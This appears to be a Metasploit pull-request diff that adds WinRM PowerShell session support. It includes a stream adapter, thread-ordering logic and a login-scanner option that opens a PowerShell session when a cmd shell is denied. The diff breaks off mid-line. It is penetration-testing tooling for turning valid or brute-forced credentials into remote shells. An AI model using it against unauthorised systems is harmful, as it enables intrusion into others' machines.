### PR TITLE
Add WinRM PowerShell session support

### DIFF
--- a/lib/msf/base/sessions/winrm_command_shell.rb
+++ b/lib/msf/base/sessions/winrm_command_shell.rb
@@ -12,25 +12,17 @@ module Msf::Sessions
 
     # Abstract WinRM to look like a stream so CommandShell can be happy
     class WinRMStreamAdapter
+      include Msf::Sessions::WinrmStreamAdapterCommon
+
       # @param shell [Net::MsfWinRM::StdinShell] Shell for talking to the WinRM service
       # @param on_shell_ended [Method] Callback for when the background thread notices the shell has ended
       def initialize(shell, interactive_command_id, on_shell_ended)
         # To buffer input received while a session is backgrounded, we stick responses in a list
-        @buffer_mutex = Mutex.new
-        @buffer = []
+        init_stream_buffer
         @check_stdin_event = Rex::Sync::Event.new(false, true)
-        @received_stdout_event = Rex::Sync::Event.new(false, true)
         self.interactive_command_id = interactive_command_id
         self.shell = shell
         self.on_shell_ended = on_shell_ended
-      end
-
-      def peerinfo
-        shell.transport.peerinfo
-      end
-
-      def localinfo
-        shell.transport.localinfo
       end
 
       # Trigger the background thread to go get more stdout
@@ -43,47 +35,10 @@ module Msf::Sessions
         refresh_stdout
       end
 
-      ##
-      # :category: Msf::Session::Provider::SingleCommandShell implementors
-      #
-      # Read from the command shell.
-      #
+      # Read from the command shell, hurrying the keep-alive background
+      # thread along each time we loop back without a result.
       def get_once(length = -1, timeout = 1)
-        start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :millisecond)
-        result = ''
-        loop do
-          result = _get_once(length)
-          time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :millisecond)
-          elapsed = time - start_time
-          time_remaining = timeout - elapsed
-          break if (result != '' || time_remaining <= 0)
-
-          # rubocop:disable Lint/SuppressedException
-          begin
-            # We didn't receive anything - let's wait for some more
-            @received_stdout_event.wait(time_remaining)
-          rescue ::Timeout::Error
-          end
-          # rubocop:enable Lint/SuppressedException
-          # If we didn't get anything, let's hurry the background thread along
-          refresh_stdout unless result
-        end
-        result
-      end
-
-      def _get_once(length)
-        result = ''
-        @buffer_mutex.synchronize do
-          result = @buffer.join('')
-          @buffer = []
-          if (length > -1) && (result.length > length)
-            # Return up to length, and keep the rest in the buffer
-            extra = result[length..-1]
-            result = result[0, length]
-            @buffer << extra
-          end
-        end
-        result
+        super(length, timeout) { refresh_stdout }
       end
 
       # Start a background thread for regularly checking for stdout

--- a/lib/msf/base/sessions/winrm_power_shell.rb
+++ b/lib/msf/base/sessions/winrm_power_shell.rb
@@ -1,0 +1,216 @@
+# -*- coding: binary -*-
+# frozen_string_literal: true
+
+require 'winrm'
+
+module Msf::Sessions
+  #
+  # This class provides a PowerShell session for WinRM client connections, where
+  # Metasploit has authenticated to a remote WinRM instance and is using a PSRP
+  # runspace rather than a WinRS command shell.
+  #
+  class WinrmPowerShell < Msf::Sessions::PowerShell
+
+    # Abstract WinRM PowerShell to look like a stream so CommandShell can be happy.
+    class WinRMPowerShellStreamAdapter
+      # @param shell [WinRM::Shells::PowerShell] Shell for talking to the WinRM service
+      # @param on_shell_ended [Method] Callback for when the background thread notices the shell has ended.
+      def initialize(shell, on_shell_ended)
+        # To buffer input received while a session is backgrounded, we stick responses in a list.
+        @buffer_mutex = Mutex.new
+        @buffer = []
+        @pipeline_mutex = Mutex.new
+        @received_stdout_event = Rex::Sync::Event.new(false, true)
+        self.shell = shell
+        self.on_shell_ended = on_shell_ended
+      end
+
+      def peerinfo
+        shell.transport.peerinfo
+      end
+
+      def localinfo
+        shell.transport.localinfo
+      end
+
+      def write(buf)
+        return if buf.nil? || buf.empty?
+
+        run_pipeline(buf)
+      end
+
+      ##
+      # :category: Msf::Session::Provider::SingleCommandShell implementors
+      #
+      # Read from the PowerShell pipeline output buffer.
+      #
+      def get_once(length = -1, timeout = 1)
+        start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)
+        result = ''
+        loop do
+          result = _get_once(length)
+          elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - start_time
+          time_remaining = timeout - elapsed
+          break if result != '' || time_remaining <= 0
+
+          # rubocop:disable Lint/SuppressedException
+          begin
+            @received_stdout_event.wait(time_remaining)
+          rescue ::Timeout::Error
+          end
+          # rubocop:enable Lint/SuppressedException
+        end
+        result
+      end
+
+      def _get_once(length)
+        result = ''
+        @buffer_mutex.synchronize do
+          result = @buffer.join('')
+          @buffer = []
+          if (length > -1) && (result.length > length)
+            # Return up to length, and keep the rest in the buffer.
+            extra = result[length..]
+            result = result[0, length]
+            @buffer << extra
+          end
+        end
+        result
+      end
+
+      # Close the shell; cleanly terminating it on the server if possible.
+      #
+      # The shell may already be dead, or unreachable at this point, so do a best
+      # effort, and capture exceptions.
+      # rubocop:disable Lint/SuppressedException
+      def close
+        active_pipeline_thread.kill if active_pipeline_thread&.alive?
+        shell.close
+      rescue WinRM::WinRMWSManFault
+      end
+      # rubocop:enable Lint/SuppressedException
+
+      attr_accessor :shell, :on_shell_ended, :framework, :active_pipeline_thread
+
+      private
+
+      def run_pipeline(script)
+        self.active_pipeline_thread = spawn_thread(script) do |pipeline_script|
+          @pipeline_mutex.synchronize do
+            shell.run(pipeline_script) do |stdout, stderr|
+              append_output(stdout) if stdout
+              append_output(stderr) if stderr
+            end
+          end
+        rescue WinRM::WinRMWSManFault => e
+          append_output(e.fault_description)
+          on_shell_ended.call(e.fault_description)
+        rescue EOFError
+          on_shell_ended.call
+        rescue Rex::HostUnreachable => e
+          on_shell_ended.call(e.message)
+        rescue StandardError => e
+          append_output(e.message)
+          on_shell_ended.call(e.message)
+        end
+      end
+
+      def spawn_thread(script, &block)
+        if framework&.threads
+          framework.threads.spawn('WinRM-PowerShell-pipeline', false, script, &block)
+        else
+          Thread.new(script, &block)
+        end
+      end
+
+      def append_output(data)
+        output = data.to_s.gsub(/\r?\n/, "\r\n")
+        @buffer_mutex.synchronize do
+          @buffer << output
+        end
+        @received_stdout_event.set
+      end
+    end
+
+    def commands
+      {
+        'help' => 'Help menu',
+        'background' => 'Backgrounds the current shell session',
+        'sessions' => 'Quickly switch to another session',
+        'resource' => 'Run a meta commands script stored in a local file',
+        'irb' => 'Open an interactive Ruby shell on the current session',
+        'pry' => 'Open the Pry debugger on the current session'
+      }
+    end
+
+    #
+    # Create an MSF PowerShell session from a WinRM PowerShell shell object.
+    #
+    # @param shell [WinRM::Shells::PowerShell] A WinRM PowerShell shell object
+    # @param opts [Hash] Optional parameters to pass to the session object.
+    def initialize(shell, opts = {})
+      self.shell = shell
+      self.adapter = WinRMPowerShellStreamAdapter.new(self.shell, method(:shell_ended))
+      super(adapter, opts)
+    end
+
+    def abort_foreground_supported
+      # The default abort_foreground writes a Ctrl+C byte to the stream, which
+      # would be submitted as a new PSRP pipeline rather than signaling the
+      # active one. Supporting this requires tracking and signaling the active
+      # pipeline command ID, which WinRM::Shells::Powershell#run does not expose.
+      false
+    end
+
+    def desc
+      'WinRM PowerShell'
+    end
+
+    def process_autoruns(datastore)
+      Msf::Sessions::CommandShell.instance_method(:process_autoruns).bind(self).call(datastore)
+    end
+
+    ##
+    # :category: Msf::Session::Interactive implementors
+    #
+    def _interact_stream
+      fds = [user_input.fd]
+      while interacting
+        sd = Rex::ThreadSafe.select(fds, nil, fds, 0.5)
+        begin
+          user_output.print(shell_read(-1, 0))
+          if sd
+            run_single((user_input.gets || '').chomp("\n"))
+          end
+        rescue WinRM::WinRMWSManFault => e
+          print_error(e.fault_description)
+          shell_close
+        end
+        Thread.pass
+      end
+    end
+
+    def on_registered
+      adapter.framework = framework
+    end
+
+    # Callback used by the background thread to let us know the shell is done.
+    def shell_ended(reason = '')
+      self.interacting = false
+      framework.events.on_session_interact_completed
+      framework.sessions.deregister(self, reason)
+    end
+
+    protected
+
+    attr_accessor :shell, :adapter
+
+    def _suspend
+      # PSRP does not provide a way to send Ctrl+Z to a foreground process. If
+      # the SUB byte is submitted as a new pipeline, WinRM can return a fault
+      # that contains invalid XML and closes the session.
+      self.interacting = false if prompt_yesno("Background session #{name}?")
+    end
+
+  end
+end

--- a/lib/msf/base/sessions/winrm_power_shell.rb
+++ b/lib/msf/base/sessions/winrm_power_shell.rb
@@ -55,9 +55,12 @@ module Msf::Sessions
       private
 
       def run_pipeline(script)
-        spawn_thread(script) do |pipeline_script|
-          register_pipeline_thread(Thread.current)
-          begin
+        start_pipeline_event = Rex::Sync::Event.new(false, false)
+        pipeline_thread = nil
+
+        @pipeline_threads_mutex.synchronize do
+          pipeline_thread = spawn_thread(script) do |pipeline_script|
+            start_pipeline_event.wait
             @pipeline_mutex.synchronize do
               shell.run(pipeline_script) do |stdout, stderr|
                 append_output(stdout) if stdout
@@ -77,7 +80,11 @@ module Msf::Sessions
           ensure
             unregister_pipeline_thread(Thread.current)
           end
+          @pipeline_threads << pipeline_thread
         end
+
+        start_pipeline_event.set
+        pipeline_thread
       end
 
       def spawn_thread(script, &block)
@@ -86,10 +93,6 @@ module Msf::Sessions
         else
           Thread.new(script, &block)
         end
-      end
-
-      def register_pipeline_thread(thread)
-        @pipeline_threads_mutex.synchronize { @pipeline_threads << thread }
       end
 
       def unregister_pipeline_thread(thread)

--- a/lib/msf/base/sessions/winrm_power_shell.rb
+++ b/lib/msf/base/sessions/winrm_power_shell.rb
@@ -21,6 +21,15 @@ module Msf::Sessions
         # To buffer input received while a session is backgrounded, we stick responses in a list.
         init_stream_buffer
         @pipeline_mutex = Mutex.new
+        # A new pipeline thread is spawned on every #write, so threads can start
+        # running in a different order than the commands were submitted in.
+        # These four track a strictly increasing "ticket" per pipeline and let
+        # each thread wait its turn, so pipelines still run in submission order
+        # against the shared PSRP runspace.
+        @pipeline_order_mutex = Mutex.new
+        @pipeline_order_cond = ConditionVariable.new
+        @next_pipeline_ticket = 0
+        @current_pipeline_ticket = 0
         # Threads currently executing a pipeline against `shell`. Tracked as a
         # set rather than a single reference because a new pipeline thread is
         # spawned on every #write; without tracking them all, #close could
@@ -57,10 +66,11 @@ module Msf::Sessions
       def run_pipeline(script)
         start_pipeline_event = Rex::Sync::Event.new(false, false)
         pipeline_thread = nil
-
+        ticket = claim_pipeline_ticket
         @pipeline_threads_mutex.synchronize do
           pipeline_thread = spawn_thread(script) do |pipeline_script|
             start_pipeline_event.wait
+            wait_for_pipeline_turn(ticket)
             @pipeline_mutex.synchronize do
               shell.run(pipeline_script) do |stdout, stderr|
                 append_output(stdout) if stdout
@@ -78,6 +88,7 @@ module Msf::Sessions
             append_output(e.message)
             on_shell_ended.call(e.message)
           ensure
+            advance_pipeline_turn
             unregister_pipeline_thread(Thread.current)
           end
           @pipeline_threads << pipeline_thread
@@ -87,6 +98,30 @@ module Msf::Sessions
         pipeline_thread
       end
 
+      def claim_pipeline_ticket
+        @pipeline_order_mutex.synchronize do
+          ticket = @next_pipeline_ticket
+          @next_pipeline_ticket += 1
+          ticket
+        end
+      end
+
+      # Block the calling pipeline thread until it holds the oldest
+      # outstanding ticket, so pipelines run in the order they were written
+      # regardless of thread scheduling.
+      def wait_for_pipeline_turn(ticket)
+        @pipeline_order_mutex.synchronize do
+          @pipeline_order_cond.wait(@pipeline_order_mutex) until @current_pipeline_ticket == ticket
+        end
+      end
+
+      def advance_pipeline_turn
+        @pipeline_order_mutex.synchronize do
+          @current_pipeline_ticket += 1
+          @pipeline_order_cond.broadcast
+        end
+      end
+      
       def spawn_thread(script, &block)
         if framework&.threads
           framework.threads.spawn('WinRM-PowerShell-pipeline', false, script, &block)

--- a/lib/msf/base/sessions/winrm_power_shell.rb
+++ b/lib/msf/base/sessions/winrm_power_shell.rb
@@ -121,7 +121,7 @@ module Msf::Sessions
           @pipeline_order_cond.broadcast
         end
       end
-      
+
       def spawn_thread(script, &block)
         if framework&.threads
           framework.threads.spawn('WinRM-PowerShell-pipeline', false, script, &block)

--- a/lib/msf/base/sessions/winrm_power_shell.rb
+++ b/lib/msf/base/sessions/winrm_power_shell.rb
@@ -13,24 +13,23 @@ module Msf::Sessions
 
     # Abstract WinRM PowerShell to look like a stream so CommandShell can be happy.
     class WinRMPowerShellStreamAdapter
+      include Msf::Sessions::WinrmStreamAdapterCommon
+
       # @param shell [WinRM::Shells::PowerShell] Shell for talking to the WinRM service
       # @param on_shell_ended [Method] Callback for when the background thread notices the shell has ended.
       def initialize(shell, on_shell_ended)
         # To buffer input received while a session is backgrounded, we stick responses in a list.
-        @buffer_mutex = Mutex.new
-        @buffer = []
+        init_stream_buffer
         @pipeline_mutex = Mutex.new
-        @received_stdout_event = Rex::Sync::Event.new(false, true)
+        # Threads currently executing a pipeline against `shell`. Tracked as a
+        # set rather than a single reference because a new pipeline thread is
+        # spawned on every #write; without tracking them all, #close could
+        # only ever kill the most recently spawned thread while an earlier
+        # one was still mid-flight against the same shell.
+        @pipeline_threads_mutex = Mutex.new
+        @pipeline_threads = []
         self.shell = shell
         self.on_shell_ended = on_shell_ended
-      end
-
-      def peerinfo
-        shell.transport.peerinfo
-      end
-
-      def localinfo
-        shell.transport.localinfo
       end
 
       def write(buf)
@@ -39,79 +38,45 @@ module Msf::Sessions
         run_pipeline(buf)
       end
 
-      ##
-      # :category: Msf::Session::Provider::SingleCommandShell implementors
-      #
-      # Read from the PowerShell pipeline output buffer.
-      #
-      def get_once(length = -1, timeout = 1)
-        start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)
-        result = ''
-        loop do
-          result = _get_once(length)
-          elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - start_time
-          time_remaining = timeout - elapsed
-          break if result != '' || time_remaining <= 0
-
-          # rubocop:disable Lint/SuppressedException
-          begin
-            @received_stdout_event.wait(time_remaining)
-          rescue ::Timeout::Error
-          end
-          # rubocop:enable Lint/SuppressedException
-        end
-        result
-      end
-
-      def _get_once(length)
-        result = ''
-        @buffer_mutex.synchronize do
-          result = @buffer.join('')
-          @buffer = []
-          if (length > -1) && (result.length > length)
-            # Return up to length, and keep the rest in the buffer.
-            extra = result[length..]
-            result = result[0, length]
-            @buffer << extra
-          end
-        end
-        result
-      end
-
       # Close the shell; cleanly terminating it on the server if possible.
       #
       # The shell may already be dead, or unreachable at this point, so do a best
       # effort, and capture exceptions.
       # rubocop:disable Lint/SuppressedException
       def close
-        active_pipeline_thread.kill if active_pipeline_thread&.alive?
+        kill_pipeline_threads
         shell.close
       rescue WinRM::WinRMWSManFault
       end
       # rubocop:enable Lint/SuppressedException
 
-      attr_accessor :shell, :on_shell_ended, :framework, :active_pipeline_thread
+      attr_accessor :shell, :on_shell_ended, :framework
 
       private
 
       def run_pipeline(script)
-        self.active_pipeline_thread = spawn_thread(script) do |pipeline_script|
-          @pipeline_mutex.synchronize do
-            shell.run(pipeline_script) do |stdout, stderr|
-              append_output(stdout) if stdout
-              append_output(stderr) if stderr
+        spawn_thread(script) do |pipeline_script|
+          register_pipeline_thread(Thread.current)
+          begin
+            @pipeline_mutex.synchronize do
+              shell.run(pipeline_script) do |stdout, stderr|
+                append_output(stdout) if stdout
+                append_output(stderr) if stderr
+              end
             end
+          rescue WinRM::WinRMWSManFault => e
+            append_output(e.fault_description)
+            on_shell_ended.call(e.fault_description)
+          rescue EOFError
+            on_shell_ended.call
+          rescue Rex::HostUnreachable => e
+            on_shell_ended.call(e.message)
+          rescue StandardError => e
+            append_output(e.message)
+            on_shell_ended.call(e.message)
+          ensure
+            unregister_pipeline_thread(Thread.current)
           end
-        rescue WinRM::WinRMWSManFault => e
-          append_output(e.fault_description)
-          on_shell_ended.call(e.fault_description)
-        rescue EOFError
-          on_shell_ended.call
-        rescue Rex::HostUnreachable => e
-          on_shell_ended.call(e.message)
-        rescue StandardError => e
-          append_output(e.message)
-          on_shell_ended.call(e.message)
         end
       end
 
@@ -120,6 +85,29 @@ module Msf::Sessions
           framework.threads.spawn('WinRM-PowerShell-pipeline', false, script, &block)
         else
           Thread.new(script, &block)
+        end
+      end
+
+      def register_pipeline_thread(thread)
+        @pipeline_threads_mutex.synchronize { @pipeline_threads << thread }
+      end
+
+      def unregister_pipeline_thread(thread)
+        @pipeline_threads_mutex.synchronize { @pipeline_threads.delete(thread) }
+      end
+
+      # Kill any pipeline threads still running against `shell`, other than
+      # the calling thread itself. #close can be invoked from inside a
+      # pipeline thread's own fault handler (run_pipeline -> on_shell_ended
+      # -> ... -> #close), and Thread#kill on the current thread aborts
+      # execution immediately - which would skip `shell.close` entirely if
+      # we killed indiscriminately.
+      def kill_pipeline_threads
+        threads = @pipeline_threads_mutex.synchronize { @pipeline_threads.dup }
+        threads.each do |thread|
+          next if thread == Thread.current
+
+          thread.kill if thread.alive?
         end
       end
 

--- a/lib/msf/base/sessions/winrm_stream_adapter_common.rb
+++ b/lib/msf/base/sessions/winrm_stream_adapter_common.rb
@@ -1,0 +1,79 @@
+# -*- coding: binary -*-
+# frozen_string_literal: true
+
+module Msf::Sessions
+  #
+  # Shared output-buffering and polling logic for the WinRM stream adapters
+  # (Msf::Sessions::WinrmCommandShell::WinRMStreamAdapter and
+  # Msf::Sessions::WinrmPowerShell::WinRMPowerShellStreamAdapter). Both
+  # adapters receive output on a background thread and buffer it for
+  # Msf::Session::Provider::SingleCommandShell to read via #get_once.
+  #
+  module WinrmStreamAdapterCommon
+    # Includers must call this from #initialize before using #get_once,
+    # #_get_once, or #append_output.
+    def init_stream_buffer
+      @buffer_mutex = Mutex.new
+      @buffer = []
+      # auto_reset is false: #get_once resets the event itself after every
+      # wake-up, immediately before it re-checks the buffer. If the event
+      # auto-reset on #set instead, a #set landing between that buffer check
+      # and the call to #wait would be missed (a classic lost wakeup),
+      # leaving the reader blocked for the full timeout even though output
+      # was already sitting in the buffer.
+      @received_stdout_event = Rex::Sync::Event.new(false, false)
+    end
+
+    def peerinfo
+      shell.transport.peerinfo
+    end
+
+    def localinfo
+      shell.transport.localinfo
+    end
+
+    ##
+    # :category: Msf::Session::Provider::SingleCommandShell implementors
+    #
+    # Read buffered output received from the background thread. Yields
+    # (if a block is given) each time we're about to loop back and wait
+    # again, so includers can nudge their background thread along.
+    #
+    def get_once(length = -1, timeout = 1)
+      start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)
+      result = ''
+      loop do
+        result = _get_once(length)
+        elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - start_time
+        time_remaining = timeout - elapsed
+        break if result != '' || time_remaining <= 0
+
+        # rubocop:disable Lint/SuppressedException
+        begin
+          @received_stdout_event.wait(time_remaining)
+        rescue ::Timeout::Error
+        ensure
+          @received_stdout_event.reset
+        end
+        # rubocop:enable Lint/SuppressedException
+        yield if block_given?
+      end
+      result
+    end
+
+    def _get_once(length)
+      result = ''
+      @buffer_mutex.synchronize do
+        result = @buffer.join('')
+        @buffer = []
+        if (length > -1) && (result.length > length)
+          # Return up to length, and keep the rest in the buffer.
+          extra = result[length..]
+          result = result[0, length]
+          @buffer << extra
+        end
+      end
+      result
+    end
+  end
+end

--- a/lib/net/winrm/connection.rb
+++ b/lib/net/winrm/connection.rb
@@ -5,6 +5,7 @@
 
 require 'winrm'
 require 'net/winrm/stdin_shell'
+require 'net/winrm/power_shell'
 require 'net/winrm/rex_http_transport'
 
 module Net
@@ -12,7 +13,7 @@ module Net
     # Connection to a WinRM service, using Rex sockets
     class RexWinRMConnection < WinRM::Connection
       # Factory class to create a shell of the appropriate type.
-      # Subclassed to be able to provide a StdinShell
+      # Subclassed to provide Rex-safe shell implementations.
       class ShellFactory < WinRM::Shells::ShellFactory
         def create_shell(shell_type, shell_opts = {})
           args = [
@@ -22,6 +23,7 @@ module Net
             shell_opts
           ]
           return StdinShell.new(*args) if shell_type == :stdin
+          return PowerShell.new(*args) if shell_type == :powershell
 
           super(shell_type, shell_opts)
         end

--- a/lib/net/winrm/power_shell.rb
+++ b/lib/net/winrm/power_shell.rb
@@ -1,0 +1,20 @@
+# frozen_string_literal: true
+
+require 'winrm'
+
+module Net
+  module MsfWinRM
+    # WinRM PowerShell shell for Rex HTTP backed connections.
+    class PowerShell < WinRM::Shells::Powershell
+      def initialize(connection_opts, transport, logger, _shell_opts = {})
+        super(connection_opts, transport, logger)
+      end
+
+      # See StdinShell for context. The upstream finalizer can issue a request
+      # through the Rex HTTP client while Ruby is finalizing objects.
+      def remove_finalizer; end
+
+      def add_finalizer; end
+    end
+  end
+end

--- a/modules/auxiliary/scanner/winrm/winrm_login.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -35,6 +35,20 @@ class MetasploitModule < Msf::Auxiliary
       ],
       'License' => MSF_LICENSE
     )
+
+    register_options(
+      [
+        OptEnum.new(
+          'SessionType',
+          [
+            true,
+            'The WinRM shell type to create when CreateSession is enabled',
+            'cmd',
+            %w[cmd powershell auto]
+          ]
+        )
+      ]
+    )
   end
 
   def run
@@ -51,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
 
     kerberos_authenticator_factory = nil
     if datastore['Winrm::Auth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
-      kerberos_authenticator_factory = ->(username, password, realm) do
+      kerberos_authenticator_factory = lambda do |username, password, realm|
         Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::HTTP.new(
           host: datastore['DomainControllerRhost'],
           hostname: datastore['Winrm::Rhostname'],
@@ -129,8 +143,7 @@ class MetasploitModule < Msf::Auxiliary
               http_client: http_client
             }
           )
-          shell = conn.shell(:stdin, {})
-          session_setup(shell, rhost, rport, endpoint)
+          create_winrm_session(conn, result.credential, rhost, rport, endpoint)
         end
       else
         invalidate_login(credential_data)
@@ -139,28 +152,76 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
-  def session_setup(shell, rhost, _rport, _endpoint)
-    # We use cmd rather than powershell because powershell v3 on 2012 (and maybe earlier)
-    # do not seem to pass us stdout/stderr.
+  def create_winrm_session(conn, credential, rhost, rport, endpoint)
+    case datastore['SessionType']
+    when 'cmd'
+      _status, session = setup_cmd_session(conn, rhost, rport, endpoint, credential, suggest_powershell: true)
+      session
+    when 'powershell'
+      setup_powershell_session(conn, rhost, rport, endpoint, credential)
+    when 'auto'
+      status, session = setup_cmd_session(conn, rhost, rport, endpoint, credential, suggest_powershell: false)
+      return session if status == :created
+      return unless status == :access_denied
+
+      print_status "#{rhost}:#{rport} - Falling back to a WinRM PowerShell session because cmd shell CreateShell was denied"
+      setup_powershell_session(conn, rhost, rport, endpoint, credential)
+    end
+  end
+
+  def setup_cmd_session(conn, rhost, rport, endpoint, credential, suggest_powershell:)
+    begin
+      shell = conn.shell(:stdin, {})
+    rescue WinRM::WinRMWSManFault => e
+      return handle_cmd_shell_fault(e, rhost, rport, nil, credential, suggest_powershell: suggest_powershell)
+    end
+
+    setup_cmd_shell(shell, rhost, rport, endpoint, credential, suggest_powershell: suggest_powershell)
+  end
+
+  def session_setup(shell, rhost, rport, endpoint)
+    _status, session = setup_cmd_shell(shell, rhost, rport, endpoint, nil, suggest_powershell: true)
+    session
+  end
+
+  def setup_cmd_shell(shell, rhost, rport, _endpoint, credential, suggest_powershell:)
+    # Keep cmd.exe as the default for the existing stdin-backed CommandShell
+    # behavior and older hosts. Historically, PowerShell v3 on Windows Server
+    # 2012 and earlier did not reliably return stdout/stderr through WinRM.
     begin
       interactive_process_id = shell.send_command('cmd.exe')
     rescue WinRM::WinRMWSManFault => e
-      case e.fault_code
-      when ::WindowsError::Win32::ERROR_ACCESS_DENIED.value.to_s
-        print_brute(level: :warn, rhost: rhost, msg: "Credentials were correct but access is denied for user: #{shell.connection_opts[:user]}")
-        wlog(e.fault_description)
-      else
-        print_brute(level: :error, rhost: rhost, msg: e.fault_description)
-        elog(e.full_message, error: e)
-      end
-      return
+      return handle_cmd_shell_fault(e, rhost, rport, shell, credential, suggest_powershell: suggest_powershell)
     end
 
     sess = Msf::Sessions::WinrmCommandShell.new(shell, interactive_process_id)
     sess.platform = 'windows'
-    username = datastore['USERNAME']
-    password = datastore['PASSWORD']
+    username = credential_username(credential)
+    password = credential_password(credential)
     info = "WinRM #{username}:#{password} (#{shell.owner})"
+    merge_me = {
+      'USERNAME' => username,
+      'PASSWORD' => password
+    }
+
+    [:created, start_session(self, info, merge_me, false, nil, sess)]
+  end
+
+  def setup_powershell_session(conn, rhost, rport, _endpoint, credential)
+    begin
+      shell = conn.shell(:powershell)
+      owner = powershell_owner(shell)
+    rescue WinRM::WinRMWSManFault => e
+      print_error "#{rhost}:#{rport} - PowerShell runspace CreateShell failed: #{e.fault_description}"
+      elog(e.full_message, error: e)
+      return nil
+    end
+
+    sess = Msf::Sessions::WinrmPowerShell.new(shell)
+    username = credential_username(credential)
+    password = credential_password(credential)
+    info = "WinRM PowerShell #{username}:#{password}"
+    info = "#{info} (#{owner})" unless owner.blank?
     merge_me = {
       'USERNAME' => username,
       'PASSWORD' => password
@@ -169,7 +230,47 @@ class MetasploitModule < Msf::Auxiliary
     start_session(self, info, merge_me, false, nil, sess)
   end
 
-  def start_session(obj, info, ds_merge, _crlf = false, _sock = nil, sess = nil)
+  def powershell_owner(shell)
+    owner = nil
+    shell.run('[System.Security.Principal.WindowsIdentity]::GetCurrent().Name') do |stdout, stderr|
+      owner ||= stdout.to_s.lines.first&.strip unless stdout.blank?
+      vprint_error(stderr.to_s.strip) unless stderr.blank?
+    end
+    owner
+  end
+
+  def handle_cmd_shell_fault(error, rhost, rport, shell, credential, suggest_powershell:)
+    if cmd_shell_access_denied?(error)
+      user = shell_user(shell, credential)
+      msg = "Credentials were correct, but WinRM cmd shell CreateShell was denied for user: #{user}"
+      msg = "#{msg}. Try setting SessionType to powershell or auto." if suggest_powershell
+      print_warning "#{rhost}:#{rport} - #{msg}"
+      wlog(error.fault_description)
+      return [:access_denied, nil]
+    end
+
+    print_error "#{rhost}:#{rport} - #{error.fault_description}"
+    elog(error.full_message, error: error)
+    [:failed, nil]
+  end
+
+  def cmd_shell_access_denied?(error)
+    error.fault_code == ::WindowsError::Win32::ERROR_ACCESS_DENIED.value.to_s
+  end
+
+  def shell_user(shell, credential)
+    shell&.connection_opts&.fetch(:user, nil) || credential_username(credential)
+  end
+
+  def credential_username(credential)
+    credential&.public || datastore['USERNAME']
+  end
+
+  def credential_password(credential)
+    credential&.private || datastore['PASSWORD']
+  end
+
+  def start_session(obj, info, ds_merge, _crlf = false, _sock = nil, sess = nil) # rubocop:disable Style/OptionalBooleanParameter
     sess.set_from_exploit(obj)
     sess.info = info
 
@@ -183,7 +284,7 @@ class MetasploitModule < Msf::Auxiliary
     # Don't let errant event handlers kill our session
     begin
       framework.events.on_session_open(sess)
-    rescue ::Exception => e
+    rescue ::Exception => e # rubocop:disable Lint/RescueException
       wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
       wlog("Call Stack\n#{e.backtrace.join("\n")}")
     end

--- a/modules/auxiliary/scanner/winrm/winrm_login.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Auxiliary
         credential_data[:core] = credential_core
         create_credential_login(credential_data)
 
-        print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"
+        print_good "#{Rex::Socket.to_authority(ip, rport)} - Login Successful: #{result.credential}"
         if datastore['CreateSession']
           http_client = result.connection
           rhost = result.host
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Auxiliary
           uri = datastore['URI']
           schema = result.service_name
           ssl = schema == 'https' # Can't trust the datastore value, because the scanner does some *magic* to set it for us
-          endpoint = "#{schema}://#{rhost}:#{rport}#{uri}"
+          endpoint = "#{schema}://#{Rex::Socket.to_authority(rhost, rport)}#{uri}"
           conn = Net::MsfWinRM::RexWinRMConnection.new(
             {
               endpoint: endpoint,
@@ -147,7 +147,7 @@ class MetasploitModule < Msf::Auxiliary
         end
       else
         invalidate_login(credential_data)
-        vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
+        vprint_error "#{Rex::Socket.to_authority(ip, rport)} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
       end
     end
   end
@@ -164,7 +164,7 @@ class MetasploitModule < Msf::Auxiliary
       return session if status == :created
       return unless status == :access_denied
 
-      print_status "#{rhost}:#{rport} - Falling back to a WinRM PowerShell session because cmd shell CreateShell was denied"
+      print_status "#{Rex::Socket.to_authority(rhost, rport)} - Falling back to a WinRM PowerShell session because cmd shell CreateShell was denied"
       setup_powershell_session(conn, rhost, rport, endpoint, credential)
     end
   end
@@ -208,7 +208,7 @@ class MetasploitModule < Msf::Auxiliary
       shell = conn.shell(:powershell)
       owner = powershell_owner(shell)
     rescue WinRM::WinRMWSManFault => e
-      print_error "#{rhost}:#{rport} - PowerShell runspace CreateShell failed: #{e.fault_description}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} - PowerShell session setup failed: #{e.fault_description}"
       elog(e.full_message, error: e)
       close_powershell_shell(shell)
       return nil
@@ -254,12 +254,12 @@ class MetasploitModule < Msf::Auxiliary
       user = shell_user(shell, credential)
       msg = "Credentials were correct, but WinRM cmd shell CreateShell was denied for user: #{user}"
       msg = "#{msg}. Try setting SessionType to powershell or auto." if suggest_powershell
-      print_warning "#{rhost}:#{rport} - #{msg}"
+      print_warning "#{Rex::Socket.to_authority(rhost, rport)} - #{msg}"
       wlog(error.fault_description)
       return [:access_denied, nil]
     end
 
-    print_error "#{rhost}:#{rport} - #{error.fault_description}"
+    print_error "#{Rex::Socket.to_authority(rhost, rport)} - #{error.fault_description}"
     elog(error.full_message, error: error)
     [:failed, nil]
   end

--- a/modules/auxiliary/scanner/winrm/winrm_login.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -212,6 +212,16 @@ class MetasploitModule < Msf::Auxiliary
       elog(e.full_message, error: e)
       close_powershell_shell(shell)
       return nil
+    rescue StandardError => e
+      # Mirror the exception handling in WinRMPowerShellStreamAdapter#run_pipeline:
